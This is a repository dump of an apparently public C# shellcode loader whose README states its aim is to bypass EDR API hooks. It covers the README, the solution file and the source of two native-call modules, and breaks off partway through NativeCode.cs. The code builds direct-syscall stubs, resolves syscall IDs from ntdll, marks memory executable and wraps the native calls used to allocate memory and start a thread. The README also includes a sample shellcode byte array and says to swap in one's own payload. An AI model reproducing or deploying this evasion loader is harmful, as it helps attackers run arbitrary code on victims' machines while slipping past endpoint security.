├── .vs
└── SysCall_ShellcodeLoad
│ └── v16
│ └── .suo
├── README.md
├── SysCall_ShellcodeLoad.sln
└── SysCall_ShellcodeLoad
├── App.config
├── Auto_NativeCode.cs
├── NativeCode.cs
├── Program.cs
├── Properties
└── AssemblyInfo.cs
├── SysCall_ShellcodeLoad.csproj
├── bin
├── Debug
│ ├── SysCall_ShellcodeLoad.exe
│ ├── SysCall_ShellcodeLoad.exe.config
│ └── SysCall_ShellcodeLoad.pdb
├── x64
│ └── Debug
│ │ ├── SysCall_ShellcodeLoad.exe
│ │ ├── SysCall_ShellcodeLoad.exe.config
│ │ └── SysCall_ShellcodeLoad.pdb
└── x86
│ └── Debug
│ ├── SysCall_ShellcodeLoad.exe
│ ├── SysCall_ShellcodeLoad.exe.config
│ └── SysCall_ShellcodeLoad.pdb
└── obj
├── Debug
├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs
├── DesignTimeResolveAssemblyReferencesInput.cache
├── SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache
├── SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt
├── SysCall_ShellcodeLoad.csprojAssemblyReference.cache
├── SysCall_ShellcodeLoad.exe
└── SysCall_ShellcodeLoad.pdb
├── x64
└── Debug
│ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache
│ ├── SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt
│ ├── SysCall_ShellcodeLoad.csprojAssemblyReference.cache
│ ├── SysCall_ShellcodeLoad.exe
│ └── SysCall_ShellcodeLoad.pdb
└── x86
└── Debug
├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs
├── DesignTimeResolveAssemblyReferencesInput.cache
├── SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache
├── SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt
├── SysCall_ShellcodeLoad.csprojAssemblyReference.cache
├── SysCall_ShellcodeLoad.exe
└── SysCall_ShellcodeLoad.pdb
/.vs/SysCall_ShellcodeLoad/v16/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/.vs/SysCall_ShellcodeLoad/v16/.suo
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SysCall_ShellcodeLoad_Csharp
2 |
3 | Blog link: working on it.
4 |
5 | Github Link: https://github.com/Kara-4search/SysCall_ShellcodeLoad_Csharp
6 |
7 | - Base on my another project: https://github.com/Kara-4search/Simple_ShellCodeLoader_CSharp
8 | - A shellcode loader written in CSharp, the main purpose is to bypass the EDR API hook.
9 | - Only tested in Win10_x64, may not gonna work in x86.
10 | - Loading shellcode with direct syscall.
11 | - You need to replace the "syscall identifier" with your syscall ID, which you could find on your system
12 | - About how to find the syscall ID on your system, check the link below:
13 |
14 | 1. Use windbg: https://jhalon.github.io/utilizing-syscalls-in-csharp-2/
15 | 2. Check the system call table: https://j00ru.vexillium.org/syscalls/nt/64/
16 | 3. Find the syscall ID automatically(DONE)
17 | - If the AV/EDRs hooked level is higher than the NTDLL level, the "Auto_NativeCode" works fine.
18 | - If the AV/EDRs already hooked some functions in NTDLL, in this case, the "Auto_NativeCode" is not gonna works, cause "GetModuleHandle" loads NTDLL from memory, which is actually the hooked version.
19 |
20 | - Original shellcode is a Message
21 | ```
22 | /* Messagebox shellcode */
23 |
24 | byte[] buf1 = new byte[328] {
25 | 0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x00, 0x00,
26 | 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65,
27 | 0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b,
28 | 0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0x0f, 0xb7, 0x4a,
29 | 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02,
30 | 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52,
31 | 0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x8b, 0x42, 0x3c, 0x48,
32 | 0x01, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0,
33 | 0x74, 0x6f, 0x48, 0x01, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44,
34 | 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e,
35 | 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31,
36 | 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75,
37 | 0xf1, 0x3e, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd6,
38 | 0x58, 0x3e, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x3e, 0x41,
39 | 0x8b, 0x0c, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x3e,
40 | 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e,
41 | 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20,
42 | 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12,
43 | 0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7, 0xc1, 0x00, 0x00, 0x00,
44 | 0x00, 0x3e, 0x48, 0x8d, 0x95, 0x1a, 0x01, 0x00, 0x00, 0x3e, 0x4c, 0x8d,
45 | 0x85, 0x35, 0x01, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83,
46 | 0x56, 0x07, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x41, 0xba, 0xa6,
47 | 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c,
48 | 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,
49 | 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x48, 0x65, 0x6C, 0x6C, 0x6F,
50 | 0x20, 0x77, 0x6F, 0x72, 0x6C, 0x64, 0x20, 0x76, 0x69, 0x61, 0x20, 0x73,
51 | 0x79, 0x73, 0x63, 0x61, 0x6C, 0x6C, 0x00, 0x41, 0x50, 0x49, 0x20, 0x54,
52 | 0x65, 0x73, 0x74, 0x00
53 | };
54 |
55 | ```
56 | - You may need to read those posts below **the Reference link** so you could understand how it works.
57 | - Feel free to make any issues.
58 |
59 |
60 | ## Usage
61 | 1. I updated the SysCall_ShellcodeLoad, now it's gonna find the syscall ID automatically(Check the file - Auto_NativeCode.cs).
62 | 2. If you want to test the old verison SysCall_ShellcodeLoad,
63 | * You just need to remove all the "Auto_NativeCode" from Program.cs
64 | * And Replace the syscall ID with your own.
65 | 3. Replace the "buf1" with your own shellcode.
66 | 
67 | 4. Replace the syscall ID with your own in NativeCode.cs(Only when you use NativeCode in steal of Auto_NativeCode).
68 | * There are three syscall IDs you need to replace.
69 | - 1). NtAllocateVirtualMemory
70 | 
71 | - 2). NtCreateThreadEx
72 | 
73 | - 3). NtWaitForSingleObject
74 | 
75 |
76 | ## TO-DO list
77 |
78 | 1. ~~Working on both x64 and x86~~
79 |
80 | 2. Make the syscall array more flexible
81 |
82 |
83 |
84 |
85 | ## Reference link:
86 |
87 | 1. https://github.com/SolomonSklash/SyscallPOC
88 | 2. https://jhalon.github.io/utilizing-syscalls-in-csharp-1/
89 | 3. https://jhalon.github.io/utilizing-syscalls-in-csharp-2/
90 | 4. https://www.solomonsklash.io/syscalls-for-shellcode-injection.html
91 | 5. https://www.pinvoke.net/default.aspx
92 | 6. https://github.com/jhalon/SharpCall/blob/master/Syscalls.cs
93 | 7. https://github.com/badBounty/directInjectorPOC
94 | 8. https://j00ru.vexillium.org/syscalls/nt/64/
95 | 9. http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtAllocateVirtualMemory.html
96 |
97 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31129.286
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SysCall_ShellcodeLoad", "SysCall_ShellcodeLoad\SysCall_ShellcodeLoad.csproj", "{A9DEC923-E66D-46D5-84EE-6D4733FF44CE}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Debug|x86 = Debug|x86
13 | Release|Any CPU = Release|Any CPU
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
19 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|Any CPU.Build.0 = Debug|Any CPU
20 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|x64.ActiveCfg = Debug|x64
21 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|x64.Build.0 = Debug|x64
22 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|x86.ActiveCfg = Debug|x86
23 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|x86.Build.0 = Debug|x86
24 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|Any CPU.ActiveCfg = Release|Any CPU
25 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|Any CPU.Build.0 = Release|Any CPU
26 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|x64.ActiveCfg = Release|x64
27 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|x64.Build.0 = Release|x64
28 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|x86.ActiveCfg = Release|x86
29 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|x86.Build.0 = Release|x86
30 | EndGlobalSection
31 | GlobalSection(SolutionProperties) = preSolution
32 | HideSolutionNode = FALSE
33 | EndGlobalSection
34 | GlobalSection(ExtensibilityGlobals) = postSolution
35 | SolutionGuid = {317660C1-68DC-426F-8A2D-ABC4AA7D3C32}
36 | EndGlobalSection
37 | EndGlobal
38 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/Auto_NativeCode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Runtime.InteropServices;
5 | using System.Text;
6 | using System.Threading.Tasks;
7 | using System.Runtime.InteropServices;
8 | using System.ComponentModel;
9 | using System.Diagnostics;
10 |
11 | /*
12 | #include
13 | #include
14 | #include
15 | #pragma comment(linker, "/section:.data,RWE")//.data段可执行
16 |
17 | CHAR FuncExample[] = {
18 | 0x4c,0x8b,0xd1, //mov r10,rcx
19 | 0xb8,0xb9,0x00,0x00,0x00, //mov eax,0B9h
20 | 0x0f,0x05, //syscall
21 | 0xc3 //ret
22 | };
23 |
24 | typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(//函数指针
25 | HANDLE ProcessHandle,
26 | PVOID* BaseAddress,
27 | ULONG_PTR ZeroBits,
28 | PSIZE_T RegionSize,
29 | ULONG AllocationType,
30 | ULONG Protect);
31 |
32 |
33 | DOUBLE GetAndSetSysCall(TCHAR* szFuncName) {
34 | DWORD SysCallid = 0;
35 | HMODULE hModule = GetModuleHandle(_T("ntdll.dll"));
36 | DWORD64 FuncAddr = (DWORD64)GetProcAddress(hModule, (LPCSTR)szFuncName);
37 | LPVOID CallAddr = (LPVOID)(FuncAddr + 4);
38 | ReadProcessMemory(GetCurrentProcess(), CallAddr, &SysCallid, 4, NULL);
39 | memcpy(FuncExample+4, (CHAR*)&SysCallid, 2);
40 | return (DOUBLE)SysCallid;
41 | }
42 |
43 | int main() {
44 | LPVOID Address = NULL;
45 | SIZE_T uSize = 0x1000;
46 | DOUBLE call = GetAndSetSysCall((TCHAR*)"NtAllocateVirtualMemory");
47 | pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)&FuncExample;
48 | NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(), &Address, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
49 | return 0;
50 |
51 | }
52 | */
53 |
54 | namespace SysCall_ShellcodeLoad
55 | {
56 | class Auto_NativeCode
57 | {
58 | [DllImport("kernel32.dll")]
59 | public static extern bool VirtualProtectEx
60 | (
61 | IntPtr hProcess,
62 | IntPtr lpAddress,
63 | UIntPtr dwSize,
64 | uint flNewProtect,
65 | out uint lpflOldProtect
66 | );
67 |
68 | [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
69 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
70 |
71 | [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
72 | public static extern IntPtr GetModuleHandle(string lpModuleName);
73 |
74 | [DllImport("kernel32.dll", SetLastError = true)]
75 | public static extern IntPtr GetCurrentProcess();
76 |
77 | [DllImport("kernel32.dll")]
78 | public static extern void RtlZeroMemory(IntPtr pBuffer, int length);
79 |
80 | [DllImport("kernel32.dll", SetLastError = true)]
81 | static extern bool ReadProcessMemory(
82 | IntPtr hProcess,
83 | IntPtr lpBaseAddress,
84 | IntPtr lpBuffer,
85 | int dwSize,
86 | out uint lpNumberOfBytesRead
87 | );
88 |
89 | public uint NTSTATUS;
90 | public static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
91 |
92 | // public uint SYSid = 0;
93 | public static byte[] SYSbyte1 =
94 | {
95 | 0x4c, 0x8b, 0xd1,
96 | 0xb8
97 | };
98 |
99 | public static byte[] SYSbyte2 =
100 | {
101 | 0x00, 0x00, 0x00,
102 | 0x0F, 0x05,
103 | 0xC3
104 | };
105 |
106 | public enum AllocationType : ulong
107 | {
108 | Commit = 0x1000,
109 | Reserve = 0x2000,
110 | Decommit = 0x4000,
111 | Release = 0x8000,
112 | Reset = 0x80000,
113 | Physical = 0x400000,
114 | TopDown = 0x100000,
115 | WriteWatch = 0x200000,
116 | LargePages = 0x20000000
117 | }
118 |
119 |
120 | public static uint GetSyscallID(string SysFunName)
121 | {
122 | uint SyscallID = 0;
123 | IntPtr SyscallID_mem = Marshal.AllocHGlobal(Marshal.SizeOf(SyscallID));
124 | RtlZeroMemory(SyscallID_mem, Marshal.SizeOf(SyscallID));
125 |
126 | IntPtr hModule = GetModuleHandle("ntdll.dll");
127 | IntPtr FunAddr = GetProcAddress(hModule, SysFunName);
128 | IntPtr CallAddr = FunAddr + 4;
129 |
130 | uint temp;
131 | bool read_result = ReadProcessMemory(GetCurrentProcess(), CallAddr, SyscallID_mem, 4, out temp);
132 | // Console.WriteLine("Error: " + Marshal.GetLastWin32Error());
133 | // Console.WriteLine("CallAddr:" + CallAddr + ", SyscallID" + SyscallID + ", temp: " + temp);
134 |
135 | SyscallID = (uint)Marshal.ReadInt32(SyscallID_mem);
136 | return SyscallID;
137 | }
138 |
139 | public static uint NtAllocateVirtualMemory
140 | (
141 | IntPtr ProcessHandle,
142 | ref IntPtr BaseAddress,
143 | IntPtr ZeroBits,
144 | ref UIntPtr RegionSize,
145 | uint AllocationType,
146 | uint Protect
147 | )
148 | {
149 | // set byte array of bNtAllocateVirtualMemory to new byte array called syscall
150 | uint SyscallID = Auto_NativeCode.GetSyscallID("NtAllocateVirtualMemory");
151 | byte[] syscall1 = SYSbyte1;
152 | byte[] syscallid = { (byte)SyscallID };
153 | byte[] syscall2 = SYSbyte2;
154 | byte[] sysfinal = syscall1.Concat(syscallid).Concat(syscall2).ToArray();
155 |
156 | /*
157 | foreach(byte temp in sysfinal)
158 | {
159 | Console.WriteLine("Sysfinal: " + temp);
160 | }
161 | */
162 |
163 | // specify unsafe context
164 | unsafe
165 | {
166 | // create new byte pointer and set value to our syscall byte array
167 | fixed (byte* ptr = sysfinal)
168 | {
169 | // cast the byte array pointer into a C# IntPtr called memoryAddress
170 | IntPtr memoryAddress = (IntPtr)ptr;
171 |
172 | // Change memory access to RX for our assembly code
173 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)sysfinal.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect))
174 | {
175 | throw new Win32Exception();
176 | }
177 |
178 | // Get delegate for NtAllocateVirtualMemory
179 | DelegatesStruct.NtAllocateVirtualMemory assembledFunction = (DelegatesStruct.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtAllocateVirtualMemory));
180 |
181 | return (uint)assembledFunction(
182 | ProcessHandle,
183 | ref BaseAddress,
184 | ZeroBits,
185 | ref RegionSize,
186 | AllocationType,
187 | Protect);
188 | }
189 | }
190 |
191 | }
192 |
193 | public static uint NtCreateThreadEx
194 | (
195 | out IntPtr hThread,
196 | uint DesiredAccess,
197 | IntPtr ObjectAttributes,
198 | IntPtr ProcessHandle,
199 | IntPtr lpStartAddress,
200 | IntPtr lpParameter,
201 | bool CreateSuspended,
202 | uint StackZeroBits,
203 | uint SizeOfStackCommit,
204 | uint SizeOfStackReserve,
205 | IntPtr lpBytesBuffer
206 | )
207 | {
208 | // set byte array of bNtCreateThread to new byte array called syscall
209 |
210 | uint SyscallID = Auto_NativeCode.GetSyscallID("NtCreateThreadEx");
211 | byte[] syscall1 = SYSbyte1;
212 | byte[] syscallid = { (byte)SyscallID };
213 | byte[] syscall2 = SYSbyte2;
214 | byte[] sysfinal = syscall1.Concat(syscallid).Concat(syscall2).ToArray();
215 |
216 | // specify unsafe context
217 | unsafe
218 | {
219 | // create new byte pointer and set value to our syscall byte array
220 | fixed (byte* ptr = sysfinal)
221 | {
222 | // cast the byte array pointer into a C# IntPtr called memoryAddress
223 | IntPtr memoryAddress = (IntPtr)ptr;
224 |
225 | // Change memory access to RX for our assembly code
226 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)sysfinal.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect))
227 | {
228 | throw new Win32Exception();
229 | }
230 |
231 | // Get delegate for NtCreateThread
232 | DelegatesStruct.NtCreateThreadEx assembledFunction = (DelegatesStruct.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtCreateThreadEx));
233 |
234 | return (uint)assembledFunction(
235 | out hThread,
236 | DesiredAccess,
237 | ObjectAttributes,
238 | ProcessHandle,
239 | lpStartAddress,
240 | lpParameter,
241 | CreateSuspended,
242 | StackZeroBits,
243 | SizeOfStackCommit,
244 | SizeOfStackReserve,
245 | lpBytesBuffer
246 | );
247 | }
248 | }
249 | }
250 |
251 | public static uint NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout)
252 | {
253 | // set byte array of bNtWaitForSingleObject to new byte array called syscall
254 |
255 | uint SyscallID = Auto_NativeCode.GetSyscallID("NtWaitForSingleObject");
256 | byte[] syscall1 = SYSbyte1;
257 | byte[] syscallid = { (byte)SyscallID };
258 | byte[] syscall2 = SYSbyte2;
259 | byte[] sysfinal = syscall1.Concat(syscallid).Concat(syscall2).ToArray();
260 |
261 | // specify unsafe context
262 | unsafe
263 | {
264 | // create new byte pointer and set value to our syscall byte array
265 | fixed (byte* ptr = sysfinal)
266 | {
267 | // cast the byte array pointer into a C# IntPtr called memoryAddress
268 | IntPtr memoryAddress = (IntPtr)ptr;
269 |
270 | // Change memory access to RX for our assembly code
271 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)sysfinal.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect))
272 | {
273 | throw new Win32Exception();
274 | }
275 |
276 | // Get delegate for NtWaitForSingleObject
277 | DelegatesStruct.NtWaitForSingleObject assembledFunction = (DelegatesStruct.NtWaitForSingleObject)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtWaitForSingleObject));
278 |
279 | return (uint)assembledFunction(Object, Alertable, Timeout);
280 | }
281 | }
282 | }
283 |
284 |
285 | public struct DelegatesStruct
286 | {
287 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
288 | public delegate uint NtAllocateVirtualMemory(
289 | IntPtr ProcessHandle,
290 | ref IntPtr BaseAddress,
291 | IntPtr ZeroBits,
292 | ref UIntPtr RegionSize,
293 | ulong AllocationType,
294 | ulong Protect);
295 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
296 | public delegate uint NtCreateThreadEx(
297 | out IntPtr hThread,
298 | uint DesiredAccess,
299 | IntPtr ObjectAttributes,
300 | IntPtr ProcessHandle,
301 | IntPtr lpStartAddress,
302 | IntPtr lpParameter,
303 | bool CreateSuspended,
304 | uint StackZeroBits,
305 | uint SizeOfStackCommit,
306 | uint SizeOfStackReserve,
307 | IntPtr lpBytesBuffer
308 | );
309 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
310 | public delegate uint NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout);
311 | }
312 |
313 | }
314 | }
315 |
--------------------------------------------------------------------------------
/SysCall_ShellcodeLoad/NativeCode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Runtime.InteropServices;
7 | using System.ComponentModel;
8 | using System.Diagnostics;
9 |
10 |
11 | namespace SysCall_ShellcodeLoad
12 | {
13 |
14 | class NativeCode
15 | {
16 | public uint NTSTATUS;
17 | public static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
18 |
19 | public enum AllocationType : ulong
20 | {
21 | Commit = 0x1000,
22 | Reserve = 0x2000,
23 | Decommit = 0x4000,
24 | Release = 0x8000,
25 | Reset = 0x80000,
26 | Physical = 0x400000,
27 | TopDown = 0x100000,
28 | WriteWatch = 0x200000,
29 | LargePages = 0x20000000
30 | }
31 |
32 |
33 | [DllImport("kernel32.dll")]
34 | public static extern bool VirtualProtectEx
35 | (
36 | IntPtr hProcess,
37 | IntPtr lpAddress,
38 | UIntPtr dwSize,
39 | uint flNewProtect,
40 | out uint lpflOldProtect
41 | );
42 |
43 | [DllImport("kernel32.dll", SetLastError = true)]
44 | public static extern IntPtr GetCurrentProcess();
45 |
46 | /*
47 | ntdll!NtAllocateVirtualMemory:
48 | 00007ffc`7a50d110 4c8bd1 mov r10,rcx
49 | 00007ffc`7a50d113 b818000000 mov eax,18h
50 | 00007ffc`7a50d118 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
51 | 00007ffc`7a50d120 7503 jne ntdll!NtAllocateVirtualMemory+0x15 (00007ffc`7a50d125)
52 | 00007ffc`7a50d122 0f05 syscall
53 | 00007ffc`7a50d124 c3 ret
54 | 00007ffc`7a50d125 cd2e int 2Eh
55 | 00007ffc`7a50d127 c3 ret
56 | */
57 |
58 | static byte[] CuNtAVM =
59 | {
60 | 0x4c, 0x8b, 0xd1, // mov r10,rcx
61 | 0xb8, 0x18, 0x00, 0x00, 0x00, // mov eax,18h
62 | 0x0F, 0x05, // syscall
63 | 0xC3 // ret
64 | };
65 |
66 | public static uint NtAllocateVirtualMemory
67 | (
68 | IntPtr ProcessHandle,
69 | ref IntPtr BaseAddress,
70 | IntPtr ZeroBits,
71 | ref UIntPtr RegionSize,
72 | uint AllocationType,
73 | uint Protect)
74 | {
75 | // set byte array of bNtAllocateVirtualMemory to new byte array called syscall
76 | byte[] syscall = CuNtAVM;
77 |
78 | // specify unsafe context
79 | unsafe
80 | {
81 | // create new byte pointer and set value to our syscall byte array
82 | fixed (byte* ptr = syscall)
83 | {
84 | // cast the byte array pointer into a C# IntPtr called memoryAddress
85 | IntPtr memoryAddress = (IntPtr)ptr;
86 |
87 | // Change memory access to RX for our assembly code
88 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect))
89 | {
90 | throw new Win32Exception();
91 | }
92 |
93 | // Get delegate for NtAllocateVirtualMemory
94 | DelegatesStruct.NtAllocateVirtualMemory assembledFunction = (DelegatesStruct.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtAllocateVirtualMemory));
95 |
96 | return (uint)assembledFunction(
97 | ProcessHandle,
98 | ref BaseAddress,
99 | ZeroBits,
100 | ref RegionSize,
101 | AllocationType,
102 | Protect);
103 | }
104 | }
105 |
106 | }
107 |
108 | /*
109 | ntdll!NtCreateThreadEx:
110 | 00007ffc`7a50e620 4c8bd1 mov r10,rcx
111 | 00007ffc`7a50e623 b8c1000000 mov eax,0C1h
112 | 00007ffc`7a50e628 f604250803fe7f01 test byte ptr[SharedUserData + 0x308(00000000`7ffe0308)],1
113 | 00007ffc`7a50e630 7503 jne ntdll!NtCreateThreadEx+0x15 (00007ffc`7a50e635)
114 | 00007ffc`7a50e632 0f05 syscall
115 | 00007ffc`7a50e634 c3 ret
116 | */
117 |
118 | static byte[] CuNtCT =
119 | {
120 | 0x4c, 0x8b, 0xd1, // mov r10,rcx
121 | 0xb8, 0xc1, 0x00, 0x00, 0x00, // mov eax,c1h
122 | 0x0F, 0x05, // syscall
123 | 0xC3 // ret
124 | };
125 |
126 | public static uint NtCreateThreadEx
127 | (
128 | out IntPtr hThread,
129 | uint DesiredAccess,
130 | IntPtr ObjectAttributes,
131 | IntPtr ProcessHandle,
132 | IntPtr lpStartAddress,
133 | IntPtr lpParameter,
134 | bool CreateSuspended,
135 | uint StackZeroBits,
136 | uint SizeOfStackCommit,
137 | uint SizeOfStackReserve,
138 | IntPtr lpBytesBuffer
139 | )
140 | {
141 | // set byte array of bNtCreateThread to new byte array called syscall
142 | byte[] syscall = CuNtCT;
143 |
144 | // specify unsafe context
145 | unsafe
146 | {
147 | // create new byte pointer and set value to our syscall byte array
148 | fixed (byte* ptr = syscall)
149 | {
150 | // cast the byte array pointer into a C# IntPtr called memoryAddress
151 | IntPtr memoryAddress = (IntPtr)ptr;
152 |
153 | // Change memory access to RX for our assembly code
154 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect))
155 | {
156 | throw new Win32Exception();
157 | }
158 |
159 | // Get delegate for NtCreateThread
160 | DelegatesStruct.NtCreateThreadEx assembledFunction = (DelegatesStruct.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtCreateThreadEx));
161 |
162 | return (uint)assembledFunction(
163 | out hThread,
164 | DesiredAccess,
165 | ObjectAttributes,
166 | ProcessHandle,
167 | lpStartAddress,
168 | lpParameter,
169 | CreateSuspended,
170 | StackZeroBits,
171 | SizeOfStackCommit,
172 | SizeOfStackReserve,
173 | lpBytesBuffer
174 | );
175 | }
176 | }
177 | }
178 |
179 | /*
180 | ntdll!NtWaitForSingleObject:
181 | 00007ffc`7a50ce90 4c8bd1 mov r10,rcx
182 | 00007ffc`7a50ce93 b804000000 mov eax,4
183 | 00007ffc`7a50ce98 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1
184 | 00007ffc`7a50cea0 7503 jne ntdll!NtWaitForSingleObject+0x15 (00007ffc`7a50cea5)
185 | 00007ffc`7a50cea2 0f05 syscall
186 | 00007ffc`7a50cea4 c3 ret
187 | */
188 | static byte[] CuNtWFSO =
189 | {
190 | 0x4c, 0x8b, 0xd1, // mov r10,rcx
191 | 0xb8, 0x04, 0x00, 0x00, 0x00, // mov eax,04h
192 | 0x0F, 0x05, // syscall
193 | 0xC3 // ret
194 | };
195 |
196 | public static uint NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout)
197 | {
198 | // set byte array of bNtWaitForSingleObject to new byte array called syscall
199 | byte[] syscall = CuNtWFSO;
200 |
201 | // specify unsafe context
202 | unsafe
203 | {
204 | // create new byte pointer and set value to our syscall byte array
205 | fixed (byte* ptr = syscall)
206 | {
207 | // cast the byte array pointer into a C# IntPtr called memoryAddress
208 | IntPtr memoryAddress = (IntPtr)ptr;
209 |
210 | // Change memory access to RX for our assembly code
